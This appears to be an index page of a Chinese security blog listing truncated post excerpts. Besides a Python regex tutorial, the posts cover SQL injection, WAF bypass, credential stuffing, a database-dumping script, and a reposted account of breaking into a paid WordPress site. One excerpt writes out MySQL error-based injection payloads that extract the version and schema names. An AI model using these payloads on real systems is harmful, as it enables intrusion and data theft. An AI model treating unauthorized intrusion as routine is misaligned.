汪洋大海 - 第55页

Python中re(正则表达式)模块学习

re.match re.match 尝试从字符串的开始匹配一个模式，如：下面的例子匹配第一个单词。 import re text = "JGood is a handsome boy, he is cool, clever, and so on..." m = re.match(r"(\w+)\s", text) if m: print m.group(0), '\n', m.group(1) else: print 'not match' re.match的函数原型为：re.match(pattern, string, flags) 第一个参数是正则表达式，这里为"(\w+...

2016年03月31日汪洋大海暂无评论喜欢 0 阅读 3,158 views 次阅读全文

Twitter推特登陆接口可撞库 Python代码

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 #!/u...

2016年03月29日汪洋大海暂无评论喜欢 0 阅读 5,209 views 次阅读全文

三个白帽挑战赛第二期的writeup(详细记录一系列的坑)

源码分析，找出二次注入点 register.php 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $username = htmlspecialchars(filter($username)); $password = md5($password); $name = htmlspecialchars(filter($name)); $limit = filter($limit); $sql = "select uid from users where username = '$username'"; $r...

2016年03月29日汪洋大海暂无评论喜欢 0 阅读 3,814 views 次阅读全文

使用sqlmap中tamper脚本绕过waf

0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击。--tamper=space2comment 由于乌云知识库少了sqlmap-tamper 收集一下，方便学习。根据sqlmap中的tamper脚本可以学习过绕过一些技巧。我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。小学生毕业的我，着能偷偷说一下多做一些收集对吸收知识很快。 0x01 start 脚本名：apostrophemask.py 作用：用utf...

2016年03月29日汪洋大海暂无评论喜欢 0 阅读 3,312 views 次阅读全文

Discuz! X3 使用tinyipdata.dat纯真IP库最新版，2016年3月数据

DX默认使用的IP库只有1M，运行时占用资源少，但很多ip不准确，更新也慢，默认存放的路径在data/ipdata/tinyipdata.dat 今天给转成纯真ip库，过程很简单 step 1，下载纯真ip库软件并安装，安装完成以后在安装目录找到qqwry.dat step 2，如果论坛是gbk编码，可以直接进入 step 3，如果是其它编码，需要将gbk编码转换成论坛对应的编码下载附件以后，使用IpLook，将qqwry.dat转...

2016年03月25日汪洋大海暂无评论喜欢 0 阅读 8,818 views 次阅读全文

记一次渗透过程(wpscan+LuManage（sql注入）+memcached未经授权访问)

文章来源土司：https://www.t00ls.net/thread-33339-1-1.html 文章作者：lalala 网站是一个wordpress的福利站，需要充值vip才可以看内容，无奈我这种屌丝肯定不会花钱去买。于是就对网站下手了。先展示一下网站首页。目标地址 WordPress的站，首先想到的便是wpscan扫 wpscan扫描爆出了网站的robots.txt,网站路径，和wp4.3.3版本。除了这些，wpcan并没有爆出太多有用的东西...

2016年03月18日汪洋大海暂无评论喜欢 0 阅读 8,251 views 次阅读全文

SQL Injections in MySQL LIMIT clause

此方法适用于MySQL 5.x中，在limit语句后面的注入例如： SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point 上面的语句包含了ORDER BY，MySQL当中UNION语句不能在ORDER BY的后面，否则利用UNION很容易就可以读取数据了，看看在MySQL 5中的SELECT语法： SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESU...

2016年03月12日汪洋大海暂无评论喜欢 0 阅读 3,595 views 次阅读全文

MYSQL高级报错注入脚本安全

MYSQL高级报错注入 and (select count(*) from mysql.user)>0/* 1、查看MYSQL版本 and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c) 2、爆所有库 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM infor...

2016年03月07日汪洋大海暂无评论喜欢 0 阅读 3,547 views 次阅读全文

深入了解SQL注入绕过waf和过滤机制

知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 0x05 本文小结 0x06 参考资料 0x00 前言笔者前几天在做测试时输入攻击向量后页面发生了重定向甚至异常输入也是重定向怀疑其中有WAF在作怪。之前对WAF接触比较少纯粹是新手趁此科普了一下并查阅了一些绕过W...

2016年03月07日汪洋大海暂无评论喜欢 0 阅读 2,921 views 次阅读全文

msql脱裤脚本千万级别无问题

[【ASP】] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 <%Server.ScriptTimeOut=12000%> <style type="text/css"> &...

2016年02月24日汪洋大海暂无评论喜欢 0 阅读 3,722 views 次阅读全文

蜗居

窄小蜗居，虽非富贵王侯宅；清闲螺径，也异寻常百姓家。 woj → 蜗居